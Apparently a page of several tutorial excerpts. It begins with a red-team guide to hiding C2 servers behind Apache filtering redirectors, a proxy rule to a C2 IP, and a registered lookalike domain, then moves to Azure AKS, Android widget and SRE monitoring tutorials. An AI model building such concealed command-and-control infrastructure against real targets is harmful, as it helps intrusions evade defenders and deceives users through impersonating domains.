The given commands need to be executed and the result is shown in the following screenshot (ignore the sudo error here; it occurred because of the hostname that we changed). Using socat or iptables, the result will be the same, i.e., the network traffic on the redirector's interface will be forwarded to our C2.

Filtration/smart redirection

Filtration redirection, also known as smart redirection, doesn't just blindly forward the network traffic to the C2. Smart redirection always processes the network traffic based on the rules defined by the red team before forwarding it to the C2. With smart redirection, if the C2 traffic is invalid, the network traffic will either be forwarded to a legitimate website or the packets will simply be dropped. Only if the network traffic is for our C2 will the redirection work accordingly: To configure smart redirection, we need to install a web service and configure it. Let's install the Apache server on the redirector using the sudo apt install apache2 command: We also need to execute the following commands in order to enable the required Apache modules (including rewrite) and SSL:

sudo apt-get install apache2
sudo a2enmod ssl rewrite proxy proxy_http
sudo a2ensite default-ssl.conf
sudo service apache2 restart

These are the commands that need to be executed. The result of the executed commands is shown in the following screenshot: We also need to adjust the Apache configuration: We need to look for the Directory directive in order to change AllowOverride from None to All so that we can use our custom .htaccess file for web request filtration. We can now set up the virtual host settings and add them to wwwpacktpub.tk (/etc/apache2/sites-enabled/default-ssl.conf): After this, we can generate the payload with a domain such as wwwpacktpub.tk in order to get a connection.
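The book configures the filtration rules in a custom .htaccess file that it shows as a screenshot, so the following is a minimal illustrative sketch only; the User-Agent pattern and the decoy URL are assumptions, not the book's exact rules:

```shell
#!/bin/sh
# Write an illustrative .htaccess for filtration ("smart") redirection.
# Written to a temp dir here for demonstration; on the redirector it
# would live in the Apache document root (with mod_rewrite and
# mod_proxy enabled, as set up above).
DEMO_DIR=$(mktemp -d)
cat > "$DEMO_DIR/.htaccess" <<'EOF'
RewriteEngine On
# Proxy only traffic that looks like our C2 callbacks (hypothetical
# stager User-Agent) through to the C2
RewriteCond %{HTTP_USER_AGENT} "MSIE 9\.0" [NC]
RewriteRule ^.*$ http://54.166.109.171:8080%{REQUEST_URI} [P]
# Everything else is bounced to a legitimate decoy site
RewriteRule ^.*$ https://www.packtpub.com/ [L,R=302]
EOF
echo "wrote $DEMO_DIR/.htaccess"
```

With rules like these, a scanner or analyst browsing the redirector sees only the decoy site, while traffic matching the payload's profile is transparently proxied to the C2.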
Domain fronting

According to https://resources.infosecinstitute.com/domain-fronting/: Domain fronting is a technique that is designed to circumvent the censorship employed for certain domains (censorship may occur for domains that are not in line with a company's policies, or it may be a result of the bad reputation of a domain). Domain fronting works at the HTTPS layer and uses different domain names at different layers of the request (more on this later). To the censors, it looks like the communication is happening between the client and a permitted domain. However, in reality, communication might be happening between the client and a blocked domain.

To make a start with domain fronting, we need to get a domain that is similar to our target organization's. To check for domains, we can use the domainhunter tool. Let's clone the repository to continue: We need to install some required Python packages before continuing further. This can be achieved by executing the pip install -r requirements.txt command as follows: After installation, we can run the tool by executing the python domainhunter.py command as follows: By default, this will search for expired and deleted domains; the name is blank because we didn't provide one: Let's check the help option to see how we can use domainhunter: Let's search for a keyword to look for related domains. In this case, we will use packtpub as the desired keyword: We just found out that wwwpacktpub.com is available. Let's confirm its availability at domain searching websites as follows: This confirms that the domain is available on name.com, and even on dot.tk for almost $8.50: Let's see if we can find a free domain with a different TLD: We have found that the preceding domains are free to register.
Let's select wwwpacktpub.tk as follows: We can again check the availability of wwwpacktpub.tk and obtain this domain for free: In the preceding setting, we need to set our redirector's IP address in the Use DNS field: Let's review the purchase and then check out: Our order has now been confirmed. We have just obtained wwwpacktpub.tk: Let's execute the dig command to confirm our ownership: The dig command resolves wwwpacktpub.tk to our redirector's IP. Now that we have obtained this, we can set the domain in the stager creation and get the back connection from wwwpacktpub.tk:

In this article, we learned the basics of redirectors and covered how to obfuscate C2s in a secure manner to protect them from being detected by the Blue team. This article also covered short-term and long-term C2s and much more. To learn more about advanced penetration testing tools, check out the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh.

Introducing numpywren, a system for linear algebra built on a serverless architecture Fortnite server suffered a minor outage, Epic Games was quick to address the issue Windows Server 2019 comes with security, storage and other changes
Melisha Dsouza
15 Jan 2019
12 min read
Implementing Azure-Managed Kubernetes and Azure Container Service [Tutorial]

Containers are the next level of virtualization, as they provide a better solution than virtual machines within Hyper-V: containers optimize resources by sharing as much as possible of the existing container platform. Azure Kubernetes Service (AKS) simplifies the deployment and operations of Kubernetes and enables users to dynamically scale their application infrastructure with agility, along with simplifying cluster maintenance with automated upgrades and scaling. Azure Container Service (ACS) simplifies the management of Docker clusters for running containerized applications.

This tutorial combines the above-defined concepts and describes how to design and implement containers, and how to choose the proper solution for orchestrating them. You will get an overview of how Azure can help you implement services based on containers and get rid of traditional virtualization overhead, with redundant OS resources that need to be managed, updated, backed up, and optimized. To run containers in a cloud environment, no specific installations are required, as you only need the following:

A computer with an internet browser
An Azure subscription (if not available, a trial could work too)

With Azure, you have the option to order a container directly as an Azure Container Instance (ACI), or a managed Azure solution using Kubernetes as the orchestrator. This tutorial is an excerpt from a book written by Florian Klaffenbach et al. titled Implementing Azure Solutions - Second Edition. This book will get you up and running with Azure services and teach you how to implement them in your organization. All of the code for this tutorial can be found at GitHub.

Azure Container Registry (ACR)

If you need to set up a container environment to be used by the developers in your Azure tenant, you will have to think about where to store your container images. In general, the way to do this is to provide a container registry.
This registry could reside on a VM itself, but using PaaS services with cloud technologies always provides an easier and more flexible design. This is where Azure Container Registry (ACR) comes in, as it is a PaaS solution that provides high flexibility and even features such as replication between geographies. When you create your container registry, you will need to define the following:

The registry name (ending with azurecr.io)
The resource group the registry sits in
The Azure location
The admin user (if you will need to log in to the registry using an account)
The SKU: Basic, Standard, or Premium

The following table details the features and limits of the Basic, Standard, and Premium service tiers:

Resource                  | Basic  | Standard | Premium
Storage                   | 10 GiB | 100 GiB  | 500 GiB
Max image layer size      | 20 GiB | 20 GiB   | 50 GiB
ReadOps per minute        | 1,000  | 3,000    | 10,000
WriteOps per minute       | 100    | 500      | 2,000
Download bandwidth (MBps) | 30     | 60       | 100
Upload bandwidth (MBps)   | 10     | 20       | 50
Webhooks                  | 2      | 10       | 100
Geo-replication           | N/A    | N/A      | Supported

Switching between the different SKUs is supported and can be done using the portal, PowerShell, or the CLI. If you are still on a classic ACR, the first step would be to upgrade to a managed registry.

Azure Container Instances

By running your workloads in ACI, you don't have to set up a management infrastructure for your containers; you can just focus on designing and building the applications.

Creating your first container in Azure

Let's create a first simple container in Azure using the portal: Go to Container Instances under New | Marketplace | Everything, as shown in the following screenshot: After having chosen the Container Instances entry in the resources list, you will have to define some properties: We will need to define the Azure container name. Of course, this needs to be unique in your environment.
Then, we will need to define the source of the image, and to which resource group and region it should be deployed within Azure. As already mentioned, containers can be Windows- or Linux-based, and this needs to be defined first. Afterwards, we will need to define the resources per container:

Cores
Memory
Ports
Port protocol
Restart policy (if the container goes offline)

After having deployed the corresponding container registry, we can start working with the container instance: When hitting the URL posted in the left part, under FQDN, you should see the following screenshot: After we have finalized the preceding steps, we have an ACI up and running, which means that you are able to provide container images, load them up to Azure, and run them.

Azure Marketplace containers

In the public Azure Marketplace, you can find existing container images that can simply be deployed to your subscription. These are pre-packaged images that give you the option to start with your first container in Azure. As cloud services provide reusability and standardization, this entry point is always a good one to look at first. Before starting with this, we will need to check whether the required resource providers are enabled on the subscription we are working with. Otherwise, we will need to register them by hitting the Register entry and waiting a few minutes for completion, as shown in the following screenshot: Now, we can start deploying marketplace containers such as the container image for WordPress, which is used as a sample, as shown in the following screenshot: At first, we will need to decide on the corresponding image and choose to create a new ACR, or use an existing one. Furthermore, the Azure region, the resource group, and the tag (for example, the version) need to be defined in the following dialog: Now that the registry has been created, we will need to update the permission settings, also called enabling the admin registry.
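The portal steps for creating the registry and enabling the admin user can also be sketched with the Azure CLI. This is a hedged outline with placeholder resource names; the commands are printed rather than executed here, since they require a live subscription:

```shell
#!/bin/sh
# 'run' only prints each command so the sequence is visible without a
# live Azure subscription; drop the wrapper to actually execute them.
run() { echo "+ $*"; }

RG=my-rg
ACR=mypacktregistry   # placeholder; must be globally unique, becomes mypacktregistry.azurecr.io

run az group create --name "$RG" --location eastus
run az acr create --resource-group "$RG" --name "$ACR" --sku Basic
# The "Admin user Enable" button in the portal corresponds to:
run az acr update --name "$ACR" --admin-enabled true
# Retrieve the admin credentials for docker login
run az acr credential show --name "$ACR"
```

This mirrors the portal workflow described above: create the registry, enable the admin user, and fetch the credentials used to push images to it.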
This can be done with the Admin user Enable button, as shown in the following screenshot: Regarding the SKU, this is just another point where we can set the priority and define performance. This may take some minutes to be enabled. Now, we can start deploying container images from the container registry, as you can see in the following screenshot with the WordPress image that is already available in the registry: At first, we will need to choose the corresponding container from the registry; right-click the tag version in the Tags section: Having done that, we will need to hit the Deploy to web app menu entry to deploy the web app to Azure: As the properties that need to be filled in are defaults for Web Apps, it is quite easy to set them: Finally, the first containerized image for a web app has been deployed to Azure.

Container orchestration

One of the most interesting topics with regard to containers is that they provide technology for scaling. For example, if we need more performance on a website that is running containerized, we would just spin up an additional container to load-balance the traffic. This could even be done if we needed to scale down.

The concept of container orchestration

For this technology, we need an orchestration tool to provide this feature set. There are some well-known container orchestration tools available on the market, such as the following:

Docker Swarm
DC/OS
Kubernetes

Kubernetes is the most used one, and therefore can be deployed as a service in most public clouds, such as Azure.
It provides the following features:

Automated container placement: On the container hosts, to best spread the load between them
Self-healing: For failed containers, restarting them in a proper way
Horizontal scaling: Automated horizontal scaling (up and down) based on the existing load
Service discovery and load balancing: By providing IP addresses to containers and managing DNS registrations
Rollout and rollback: Automated rollout and rollback for containers, which provides another self-healing feature, as newly rolled-out updated containers are rolled back if something goes wrong
Configuration management: By updating secrets and configurations without the need to fully rebuild the container itself

Azure Kubernetes Service (AKS)

Installing, maintaining, and administering a Kubernetes cluster manually could mean a huge investment of time for a company. In general, these tasks are one-off costs, and therefore it would be best not to waste these resources. In Azure today, there is a feature called AKS, where the K emphasizes that it is a managed Kubernetes service. With AKS, there is no charge for Kubernetes masters; you just have to pay for the nodes that run the containers. Before you start, you will have to fulfill the following prerequisites:

An Azure account with an active subscription
Azure CLI installed and configured
The Kubernetes command-line tool, kubectl, installed

Make sure that the Azure subscription you use has the required resources—storage, compute, networking, and a container service: For the first step, you need to choose Kubernetes service and create your AKS deployment for your tenant.
The following parameters need to be defined:

Resource group for the deployment
Kubernetes cluster name
Azure region
Kubernetes version
DNS prefix

Then, hit the Authentication tab, as shown in the following screenshot: On the Authentication tab, you will need to define a service principal or choose an existing one, as AKS needs a service principal to run the deployment. In addition, you can enable the RBAC feature, which gives you the chance to define fine-grained permissions based on Azure AD accounts and groups. On the Networking tab, you can choose either to add the Kubernetes cluster to an existing VNET, or to create a new one. In addition, the HTTP routing feature can be enabled or disabled: On the Monitoring tab, you have the option to enable container monitoring and link it to an existing Log Analytics workspace, or create a new one: Next, you can set your required tags: Finally, the validation will check for any misconfigurations and create the Azure ARM template for the deployment. Clicking the Create button will start the deployment phase, which could run for several minutes or even longer, depending on the chosen features and scale: After the deployment has finished, the Kubernetes dashboard is available. You can view it by clicking on the View Kubernetes dashboard link, as shown in the following screenshot: The dashboard looks something like the one shown in the following screenshot: As you can see in the preceding screenshot, there are four steps to open the dashboard. First, we will need to install the Azure CLI in its most current version using the statement mentioned in the following screenshot: Afterward, the Kubernetes command-line tool needs to be installed; it is called kubectl.exe.
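As a hedged sketch (placeholder names; the commands are printed rather than executed, since a live subscription is required), the CLI steps for installing kubectl and connecting to the new cluster might look like this:

```shell
#!/bin/sh
# 'run' only prints each command so the sequence is visible without a
# live Azure subscription; drop the wrapper to actually execute them.
run() { echo "+ $*"; }

RG=my-rg
CLUSTER=my-aks-cluster   # placeholder names for this sketch

# Install kubectl through the Azure CLI
run az aks install-cli
# Merge the cluster credentials into ~/.kube/config
run az aks get-credentials --resource-group "$RG" --name "$CLUSTER"
# Verify connectivity, then open the Kubernetes dashboard
run kubectl get nodes
run az aks browse --resource-group "$RG" --name "$CLUSTER"
```

This matches the four dashboard steps mentioned above: install the CLI, install kubectl, pull the cluster credentials, and browse to the dashboard.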
Finally, after setting all the parameters (and when you have performed steps 3 and 4 from the preceding task list), the following dashboard should open in a new browser window: The preceding dashboard provides a way to monitor and administer your Azure Kubernetes environment from a GUI. If a new Kubernetes version becomes available, you can easily update the cluster from the Azure portal yourself with one click, as shown in the following screenshot: If you need to scale your AKS hosts, this is quite easy too, as you can do it through the Azure portal. A maximum of 100 hosts, with 3 vCPUs and 10.5 GB RAM per host, is currently possible: You can now upload your containers to your AKS-enabled Docker environment and have a hugely scalable infrastructure with a minimum of administrative tasks and implementation time. If you need to monitor AKS, it integrates completely with Azure monitoring. By clicking the Monitor container health link, you will be directed to the following overview: The Nodes tab provides the following information per node: This not only gives a brief overview of the health status, but also the number of containers and the load on the node itself.
The Controllers view provides detailed information on the AKS controllers, their services, status, and uptime. And finally, the Containers tab gives a deep overview of the health state of each container running in the infrastructure (system containers included). By hitting the Search logs section, you can define your own custom Azure monitoring searches and integrate them into your custom portal.

To get everything up and running, the following to-do list gives a brief overview of all the tasks needed to provide an app within AKS:

1. Prepare the AKS app
2. Create the container registry
3. Create the Kubernetes cluster
4. Run the application in AKS
5. Scale the application in AKS
6. Update the application in AKS

AKS has the following service quotas and limits:

- Max nodes per cluster: 100
- Max pods per node (basic networking with kubenet): 110
- Max pods per node (advanced networking with Azure CNI): 30
- Max clusters per subscription: 100

As you have seen, AKS in Azure provides great features with a minimum of administrative tasks.

Summary

In this tutorial, we learned the basics required to understand, deploy, and manage container services in a public cloud environment. The concept of containers is a great idea, and surely the next step in virtualization that applications need to take. Setting up the environment manually is quite complex, but with the PaaS approach, the setup procedure is simple (because of automation) and allows you to just start using it. To understand how to build robust cloud solutions on Azure, check out our book Implementing Azure Solutions - Second Edition.
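The to-do list above can be sketched as one command sequence. All names (`aksRG`, `myRegistry`, `aksCluster`, `myapp`) are placeholders, and a Kubernetes manifest for the app is assumed to exist as `myapp.yaml`:

```shell
# 1. Create a resource group and a container registry, then build/push the app image
az group create --name aksRG --location westeurope
az acr create --resource-group aksRG --name myRegistry --sku Basic
az acr build --registry myRegistry --image myapp:v1 .

# 2. Create the Kubernetes cluster and fetch its credentials
az aks create --resource-group aksRG --name aksCluster --node-count 3
az aks get-credentials --resource-group aksRG --name aksCluster

# 3. Run, scale, and update the application in AKS
kubectl apply -f myapp.yaml
kubectl scale deployment myapp --replicas=5
kubectl set image deployment/myapp myapp=myregistry.azurecr.io/myapp:v2
```

As with the earlier snippets, this is an illustrative outline that assumes a working Azure subscription and registry integration, not the book's exact listing.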

Natasha Mathur
14 Jan 2019
12 min read

Implementing a home screen widget and search bar on Android [Tutorial]

In this tutorial, we'll look at how to create a home screen App Widget that users can add to their Home screen. We'll also explore adding a Search option to the Action Bar using the Android SearchManager API. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores techniques and knowledge of graphics, animations, media, and more, to help you develop applications using the latest Android framework.

Creating a Home screen widget

Before we dig into the code for creating an App Widget, let's cover the basics. There are three required components and one optional one:

- The AppWidgetProviderInfo file: an XML resource
- The AppWidgetProvider class: a Java class
- The View layout file: a standard layout XML file, with some restrictions
- The App Widget configuration Activity (optional): an Activity the OS will launch when placing the widget, to provide configuration options

The AppWidgetProvider must also be declared in the AndroidManifest file. Since AppWidgetProvider is a helper class based on the Broadcast Receiver, it is declared in the manifest with the <receiver> element. Here is an example manifest entry: The metadata points to the AppWidgetProviderInfo file, which is placed in the res/xml directory.
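The manifest entry referenced above was lost in extraction; a minimal sketch of what such a declaration typically looks like (class and resource names follow this recipe, but treat the exact attributes as illustrative):

```xml
<receiver android:name=".HomescreenWidgetProvider">
    <intent-filter>
        <action android:name="android.appwidget.action.APPWIDGET_UPDATE" />
    </intent-filter>
    <meta-data
        android:name="android.appwidget.provider"
        android:resource="@xml/appwidget_info" />
</receiver>
```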
Here is a sample AppWidgetProviderInfo.xml file: The following is a brief overview of the available attributes:

- minWidth: the default width when placed on the Home screen
- minHeight: the default height when placed on the Home screen
- updatePeriodMillis: the onUpdate() polling interval (in milliseconds)
- initialLayout: the App Widget layout
- previewImage (optional): the image shown when browsing App Widgets
- configure (optional): the activity to launch for configuration settings
- resizeMode (optional): flags indicating resizing options: horizontal, vertical, none
- minResizeWidth (optional): the minimum width allowed when resizing
- minResizeHeight (optional): the minimum height allowed when resizing
- widgetCategory (optional): Android 5+ only supports Home screen widgets

The AppWidgetProvider extends the BroadcastReceiver class, which is why the <receiver> element is used when declaring the App Widget in the Manifest. As a BroadcastReceiver, the class still receives OS broadcast events, but the helper class filters those events down to the ones applicable to an App Widget. The AppWidgetProvider class exposes the following methods:

- onUpdate(): called when initially created and at the interval specified
- onAppWidgetOptionsChanged(): called when initially created and any time the size changes
- onDeleted(): called any time a widget is removed
- onEnabled(): called the first time a widget is placed (it isn't called when adding second and subsequent widgets)
- onDisabled(): called when the last widget is removed
- onReceive(): called on every event received, including the preceding events; usually not overridden, as the default implementation only dispatches applicable events

The last required component is the layout.
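The sample AppWidgetProviderInfo.xml itself did not survive extraction; a minimal illustrative version using the attributes just listed might look like this (the values are assumptions, not the book's originals):

```xml
<appwidget-provider xmlns:android="http://schemas.android.com/apk/res/android"
    android:minWidth="40dp"
    android:minHeight="40dp"
    android:updatePeriodMillis="0"
    android:initialLayout="@layout/widget"
    android:widgetCategory="home_screen" />
```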
An App Widget uses a Remote View, which only supports a subset of the available layouts: AdapterViewFlipper, FrameLayout, GridLayout, GridView, LinearLayout, ListView, RelativeLayout, StackView, and ViewFlipper. It supports the following widgets: AnalogClock, Button, Chronometer, ImageButton, ImageView, ProgressBar, TextClock, and TextView.

With the App Widget basics covered, it's now time to start coding. Our example will cover the basics so you can expand the functionality as needed. This recipe uses a View with a clock which, when pressed, opens our activity. The first screenshot shows the widget in the widget list when adding it to the Home screen (the widget list's appearance varies by the launcher used); the second shows the widget after it has been added to the Home screen.

Getting ready

Create a new project in Android Studio and call it AppWidget. Use the default Phone & Tablet options and select the Empty Activity option when prompted for the Activity Type.

How to do it...

We'll start by creating the widget layout, which resides in the standard layout resource directory. Then, we'll create the XML resource directory to store the AppWidgetProviderInfo file. We'll add a new Java class and extend AppWidgetProvider, which handles the onUpdate() call for the widget. With the receiver created, we can then add it to the Android Manifest. Here are the detailed steps:

1. Create a new file in res/layout called widget.xml.
2. Create a new directory called xml in the resource directory. The final result will be res/xml.
3. Create a new file in res/xml called appwidget_info.xml. (If you cannot see the new xml directory, switch from the Android view to the Project view in the Project panel drop-down.)
4. Create a new Java class called HomescreenWidgetProvider, extending AppWidgetProvider.
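The widget.xml layout from step 1 was stripped from this extract; a plausible minimal version for a clock widget (illustrative, not the book's exact file):

```xml
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:orientation="vertical">

    <AnalogClock
        android:id="@+id/analogClock"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_gravity="center" />
</LinearLayout>
```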
5. Add an onUpdate() method to the HomescreenWidgetProvider class.
6. Add the HomescreenWidgetProvider to the AndroidManifest, declaring it with a <receiver> element within the <application> element.
7. Run the program on a device or emulator. After first running the application, the widget will be available to add to the Home screen.

How it works...

Our first step is to create the layout file for the widget. This is a standard layout resource, with the restrictions that follow from an App Widget being a Remote View, as discussed in the recipe introduction. Although our example uses an AnalogClock widget, this is where you'd expand the functionality based on your application's needs.

The xml resource directory stores the AppWidgetProviderInfo file, which defines the default widget settings. These configuration settings determine how the widget is displayed when initially browsing the available widgets. We use very basic settings for this recipe, but they can easily be expanded to include additional features, such as a preview image showing a functioning widget, and sizing options. The updatePeriodMillis attribute sets the update frequency. Since each update wakes up the device, it's a trade-off between having up-to-date data and battery life. (This is where the optional settings Activity is useful, by letting the user decide.)

The AppWidgetProvider class is where we handle the onUpdate() event triggered by the updatePeriodMillis polling. Our example doesn't need any updating, so we set the polling interval to zero; the update is still called when the widget is initially placed. onUpdate() is where we set the pending intent to open our app when the clock is pressed. Since the onUpdate() method is probably the most complicated aspect of App Widgets, we'll explain it in some detail. First, it's worth noting that onUpdate() occurs only once per polling interval, for all the widgets created by this provider.
(All additional widgets created will use the same cycle as the first widget created.) This explains the for loop, as we need to iterate through all the existing widgets. This is where we create a pending intent, which calls our app when the clock widget is pressed. As discussed earlier, an App Widget is a Remote View; therefore, to get the layout, we call RemoteViews() with our fully qualified package name and the layout ID. Once we have the layout, we attach the pending intent to the clock view using setOnClickPendingIntent(). We then call the AppWidgetManager method updateAppWidget() to commit the changes we made.

The last step to make all this work is to declare the widget in the Android Manifest. We identify the action we want to handle with the <intent-filter>; most App Widgets will want to handle the Update event, as ours does. The other item to note in the declaration is the <meta-data> element, which tells the system where to find our configuration file.

Adding Search to the Action Bar

Along with the Action Bar, Android 3.0 introduced the SearchView widget, which can be included as a menu item when creating a menu. This is now the recommended UI pattern for providing a consistent search experience. The first screenshot shows the initial appearance of the Search icon in the Action Bar; the second shows how the Search option expands when pressed. If you want to add Search functionality to your application, this recipe will walk you through the steps to set up your user interface and properly configure the Search Manager API.

Getting ready

Create a new project in Android Studio and call it SearchView. Use the default Phone & Tablet options and select Empty Activity when prompted for the Activity Type.

How to do it...

To set up the Search UI pattern, we need to create the Search menu item and a resource called searchable. We'll create a second activity to receive the search query. Then, we'll hook it all up in the AndroidManifest file.
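The onUpdate() implementation explained above was not preserved in this extract; the following sketch is consistent with that explanation (class and layout names follow the recipe, but treat the code as an illustrative Android framework sketch rather than the book's exact listing):

```java
public class HomescreenWidgetProvider extends AppWidgetProvider {
    @Override
    public void onUpdate(Context context, AppWidgetManager appWidgetManager,
                         int[] appWidgetIds) {
        // onUpdate() fires once per cycle for all widgets, so iterate over them
        for (int appWidgetId : appWidgetIds) {
            // Pending intent that opens our activity when the clock is pressed
            Intent intent = new Intent(context, MainActivity.class);
            PendingIntent pendingIntent =
                    PendingIntent.getActivity(context, 0, intent, 0);

            // An App Widget is a Remote View: load the layout by package + ID
            RemoteViews views = new RemoteViews(context.getPackageName(),
                    R.layout.widget);
            views.setOnClickPendingIntent(R.id.analogClock, pendingIntent);

            // Commit the changes
            appWidgetManager.updateAppWidget(appWidgetId, views);
        }
    }
}
```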
To get started, open the strings.xml file in res/values and follow these steps:

1. Add the string resources for the search title and hint.
2. Create the menu directory: res/menu.
3. Create a new menu resource called menu_search.xml in res/menu.
4. Open MainActivity and add the following onCreateOptionsMenu() to inflate the menu and set up the Search Manager:

```java
@Override
public boolean onCreateOptionsMenu(Menu menu) {
    MenuInflater inflater = getMenuInflater();
    inflater.inflate(R.menu.menu_search, menu);
    SearchManager searchManager =
            (SearchManager) getSystemService(Context.SEARCH_SERVICE);
    MenuItem searchItem = menu.findItem(R.id.menu_search);
    SearchView searchView = (SearchView) searchItem.getActionView();
    searchView.setSearchableInfo(
            searchManager.getSearchableInfo(getComponentName()));
    return true;
}
```

5. Create a new XML resource directory: res/xml.
6. Create a new file in res/xml called searchable.xml.
7. Create a new layout called activity_search_result.xml.
8. Add a new Empty Activity to the project called SearchResultActivity.
9. Add the following variable to the class: TextView mTextViewSearchResult;
10. Change onCreate() to load our layout, set the TextView, and check for the QUERY action.
11. Add a method to handle the search.
12. With the user interface and code now complete, hook everything up in the AndroidManifest, including both activities.

Run the application on a device or emulator. Type in a search query and hit the Search button (or press Enter). SearchResultActivity will be displayed, showing the search query entered.

How it works...

Since the New Project Wizard uses the AppCompat library, our example uses the support library API. Using the support library provides the greatest device compatibility, as it allows the use of modern features (such as the Action Bar) on older versions of the Android OS. We start by creating string resources for the SearchView.
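The XML resources from steps 3 and 6 were stripped from this extract; plausible minimal versions follow (the string resource names and attribute values are illustrative assumptions):

```xml
<!-- res/menu/menu_search.xml -->
<menu xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto">
    <item
        android:id="@+id/menu_search"
        android:title="@string/search_title"
        app:showAsAction="collapseActionView|ifRoom"
        app:actionViewClass="android.support.v7.widget.SearchView" />
</menu>

<!-- res/xml/searchable.xml -->
<searchable xmlns:android="http://schemas.android.com/apk/res/android"
    android:label="@string/app_name"
    android:hint="@string/search_hint" />
```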
In step 3, we create the menu resource, as we've done many times. One difference is that we use the app namespace for the showAsAction and actionViewClass attributes. Earlier versions of the Android OS don't include these attributes in the Android namespace, which is why we declare an app namespace; this serves as a way to bring new functionality to older versions of the Android OS. In step 4, we set up the SearchManager, using the support library APIs.

Step 6 is where we define the searchable XML resource, which is used by the SearchManager. The only required attribute is the label, but a hint is recommended so the user has an idea of what to type in the field. The android:label must match the application name or the activity name, and must use a string resource (it does not work with a hardcoded string).

Steps 7-11 are for the SearchResultActivity. Calling a second activity is not a requirement of the SearchManager, but it is commonly done to provide a single activity for all searches initiated in your application. If you run the application at this point, you will see the search icon, but nothing will work yet.

Step 12 is where we put it all together in the AndroidManifest file. The first item to note is the default searchable <meta-data> element. Notice that it is in the <application> element and not in either of the <activity> elements. By defining it at the <application> level, it automatically applies to all activities. (If we moved it to the MainActivity element, it would behave exactly the same in our example.) You can define styles for your application in the <application> node and still override individual activity styles in the <activity> node. We also specify the searchable resource in the SearchResultActivity <meta-data> element, and we set the intent filter for SearchResultActivity. The SearchManager broadcasts the SEARCH intent when the user initiates a search, and this declaration directs the intent to the SearchResultActivity activity.
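The manifest fragments referenced above did not survive extraction; a sketch of the relevant parts (activity names follow the recipe, exact attributes are illustrative):

```xml
<application ... >
    <!-- Application-level default searchable resource -->
    <meta-data
        android:name="android.app.default_searchable"
        android:value=".SearchResultActivity" />

    <activity android:name=".MainActivity"> ... </activity>

    <activity android:name=".SearchResultActivity">
        <!-- Direct the SEARCH intent to this activity -->
        <intent-filter>
            <action android:name="android.intent.action.SEARCH" />
        </intent-filter>
        <!-- Points to res/xml/searchable.xml -->
        <meta-data
            android:name="android.app.searchable"
            android:resource="@xml/searchable" />
    </activity>
</application>
```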
Once the search is triggered, the query text is sent to SearchResultActivity with the SEARCH intent. In onCreate(), we check for the SEARCH intent and extract the query string. You now have the Search UI pattern fully implemented. With the UI pattern complete, what you do with the search results is specific to your application's needs: depending on your application, you might search a local database, or perhaps a web service.

So, we discussed creating a Home screen widget and adding Search to the Action Bar. Be sure to check out the book 'Android 9 Development Cookbook - Third Edition' if you're interested in learning how to show your app in full screen and enable lock screen shortcuts.
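The query-extraction code mentioned in the discussion above was stripped from this extract; the usual pattern in SearchResultActivity looks roughly like this (the view ID and helper method name are illustrative assumptions):

```java
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_search_result);
    mTextViewSearchResult = findViewById(R.id.textViewSearchResult);

    // The SearchManager delivers the query via the SEARCH intent
    if (Intent.ACTION_SEARCH.equals(getIntent().getAction())) {
        String query = getIntent().getStringExtra(SearchManager.QUERY);
        handleSearch(query);
    }
}

private void handleSearch(String query) {
    // Application-specific: here we simply display the query
    mTextViewSearchResult.setText(query);
}
```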

Savia Lobo
13 Jan 2019
15 min read

Post-production activities for ensuring and enhancing IT reliability [Tutorial]

Evolving business expectations are being steadily automated through a host of developments in the IT space. These improvements empower businesses to deliver new and premium offerings fast, and businesses are insisting on reliable operations. IT practitioners are therefore striving to bring forth viable methods and mechanisms toward reliable IT. Site Reliability Engineering (SRE) is a promising engineering discipline whose key goals include significantly enhancing and ensuring the reliability of IT.

In this tutorial, we will focus on the various ways and means of improving reliability assurance by embarking on some unique activities in the post-production/deployment phase. Monitoring, measuring, and managing the various operational and behavioral data is the first and foremost step toward reliable IT infrastructures and applications. This tutorial is an excerpt from a book titled Practical Site Reliability Engineering, written by Pethuru Raj Chelliah, Shreyash Naithani, and Shailender Singh. The book will teach you to create, deploy, and manage applications at scale using Site Reliability Engineering (SRE) principles. All the code files for this book can be found on GitHub.

Monitoring clouds, clusters, and containers

Cloud centers are being increasingly containerized and managed; that is, there are going to be well-entrenched containerized clouds soon. The formation and management of containerized clouds is simplified through a host of container orchestration and management tools, both open source and commercial-grade. Kubernetes is emerging as the leading container orchestration and management platform. Thus, by leveraging the aforementioned toolsets, the process of setting up and sustaining containerized clouds becomes accelerated, risk-free, and rewarding.
The tool-assisted monitoring of cloud resources (both coarse-grained and fine-grained) and applications in production environments is crucial to scaling the applications and providing resilient services. In a Kubernetes cluster, application performance can be examined at many different levels: containers, pods, services, and clusters. Through a single pane of glass, the operations team can provide running applications and their resource-utilization details to their users. These give users the right insights into how the applications are performing, where application bottlenecks may be found, if any, and how to surmount any deviations and deficiencies. In short, application performance, security, scalability constraints, and other pertinent information can be captured and acted upon.

Cloud infrastructure and application monitoring

The cloud idea has disrupted, innovated, and transformed the IT world. Yet the various cloud infrastructures, resources, and applications ought to be minutely monitored and measured through automated tools. The aspect of automation is gathering momentum in the cloud era: a slew of flexibilities in the form of customization, configuration, and composition are being enacted through cloud automation tools, and a bevy of manual and semi-automated tasks are being fully automated. In this section, we will look at infrastructure monitoring in the service of infrastructure optimization and automation.

Enterprise-scale and mission-critical applications are being cloud-enabled to be deployed in various cloud environments (private, public, community, and hybrid). Furthermore, applications are being meticulously developed and deployed directly on cloud platforms using a microservices architecture (MSA). Thus, besides cloud infrastructures, there are cloud-based IT platforms and middleware, business applications, and database management systems.
IT as a whole is accordingly being modernized to be cloud-ready, and it is very important to precisely monitor and measure every asset and aspect of cloud environments. Organizations need the capability to precisely monitor the usage of the participating cloud resources. If there is any deviation, the monitoring feature triggers an alert so that the team concerned can decide on the next course of action. The monitoring capability includes viable tools for monitoring CPU usage per computing resource, the varying ratios between system activity and user activity, and the CPU usage of specific job tasks. Organizations also need an intrinsic capability for predictive analytics that allows them to capture trending data on memory utilization and filesystem growth. These details help the operations team to proactively plan the needed changes to computing, storage, and network resources before they encounter service-availability issues. Timely action is essential for ensuring business continuity.

